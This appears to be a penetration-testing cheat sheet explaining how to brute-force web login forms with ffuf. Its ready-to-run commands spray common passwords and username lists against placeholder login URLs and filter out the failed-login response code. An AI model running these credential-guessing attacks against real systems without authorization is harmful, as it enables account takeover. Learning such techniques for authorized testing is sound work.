Brute-Force Web Login Forms with ffuf
Summary
Brute-forces HTTP POST login forms with ffuf, using single or clustered wordlists and filtering out the failed-login response code.
Walkthrough
Use ffuf against HTTP POST login forms to spray credentials. The key is filtering responses so only successful logins stand out — here -fc 200 hides the failed-login status (adjust to match the target's behavior).
Steps
- Username + password clusterbomb — load two wordlists (
:W1and:W2) and substitute both into the POST body:
``bash ffuf -w valid_usernames.txt:W1 -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/customers/login -fc 200 ``
- Password-only spray for a known user — use the
FUZZkeyword against a fixed username:
``bash ffuf -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/ -fc 200 ``
- Inline clustered wordlists — define both wordlists in a single
-wargument:
``bash ffuf -w users.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -fc 200 ``
Commands
bash
ffuf -w valid_usernames.txt:W1 -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/customers/login -fc 200
bash
ffuf -w /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/ -fc 200
bash
ffuf -w users.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<IP>/login.php -fc 200